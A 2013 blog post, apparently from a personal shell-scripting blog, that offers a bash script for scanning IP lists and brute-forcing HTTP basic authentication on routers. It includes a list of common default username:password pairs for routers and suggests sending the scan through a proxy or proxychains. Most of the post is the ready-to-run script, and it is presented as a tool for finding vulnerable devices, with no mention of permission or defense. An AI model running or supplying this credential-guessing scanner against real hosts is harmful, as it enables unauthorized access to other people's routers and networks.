Tuesday, January 22, 2013

find routers with default password


Entry moved here: http://wondershell.wordpress.com/2014/04/09/find-routers-with-default-password/

Another day, another script...

This script assumes you have a list of ip addresses stored in one file and list of username:password pairs in the other. There are some variables within the script itself which allow you to limit the search to the hosts that respond to ICMP echo requests or display only those IP's that responded to ping. This is designed such way because some hosts might not respond to ICMP echo request and still have open port 80.

Example content of username:password file:

  admin:admin
  admin:password
  admin:
  ADSL:expert03
  ZXDSL:ZXDSL
  admin:administrator
  admin:comcast
  admin:1234

Here is script output produced when displaying all IPs and their statuses:



..and the other output displaying only 'Alive' ones:




  ALIVE means host responded to ping. 
  200 means HTTP server response on port 80 was HTTP/1.* 200 OK
  401 means HTTP server requested authorisation - this is what we are looking for.     
    
    Vertical bars after 401 status indicate username:password pairs used to    
    authenticate. If correct pair is found - it is displayed after PASS.

Finaly, the script itself:
#!/bin/bash

#=================#
#    VARIABLES    #
#=================#

  ips=`cat ip.list`
  users=`cat users.list`
  PING_CHECK=0
  DISPLAY_DEAD=1

# FOR ALL IP ADDRESSES IN THE FILE

for ip in $ips; do

  # IF  YOU WANT TO LIMIT THE CHECK TO ONLY 
  # REACHABLE BY ICMP SET PING_CHECK VARIABLE

  if [[ $PING_CHECK -eq 1 ]];then
    connection=`ping -W 1 -c 1 $ip | grep "1 packets" | grep -v "errors" | cut -d " " -f 6 | cut -b 1`
  else
    connection=0
  fi

  if [[ $connection -eq 0 ]]; then
    if [[ $PING_CHECK -eq 1 ]]; then

      # ALIVE MEANS REACHABLE BY PING

      echo -ne "\n $ip\t\033[1;32mALIVE\033[0m "; 
    else
      echo -ne "\n $ip\t";
    fi

    flag=0
    while [[ $flag -eq 0 ]]; do

    # SET THE CURL TO USE PROXY WITH -x PARAMETER 
    # OR RUN SCRIPT VIA PROXYCHAIN

      header=`curl --connect-timeout 3 -I -s $ip --location | head -1`
      web=`echo $header | grep " 200" | wc -w`
      auth=`echo $header | grep "HTTP/1.1 401" | wc -w`

      if [[ $web -gt 1 ]]; then
        
        # HTTP/1.* 200 OK - WEB SERVER FOUND

        echo -ne "\t \033[37m-> 200\033[0m " 
      fi

      if [[ $auth -gt 1 ]]; then

        # HTTP/1.* 401 AUTHORIZATION REQUIRED

        echo -ne "\t \033[37m-> 401\033[0m " 


        # TRY AUTHENTICATE WITH COMMON USERNAMES 
        # AND PASSWORDS FROM $users FILE

        for user in $users; do
          passcheck=`curl --connect-timeout 3 -I -s -u $user $ip --location | head -1 | grep "HTTP/1.1 401" | wc -w`
          if [[ $passcheck -lt 1 && $flag -eq 0 ]]; then
            

            # DISPLAY PASSWORD IF FOUND

            echo -ne "\t\033[32mPASS: $user\033[0m"; 

            flag=1
            break;
          else
            echo -ne "\033[37m|\033[0m";
          fi
        done
      fi
      flag=1
    done
  else
    # IF YOU WANT TO SEE ALL IP ADDRESSES THAT ARE BEING CHECKED
    # SET $DISPLAY_DEAD
    if [[ $DISPLAY_DEAD -eq 1 ]]; then
      echo -ne "\n $ip\t\033[31mDEAD\033[0m ";
    fi
  fi
done


No comments:

Post a Comment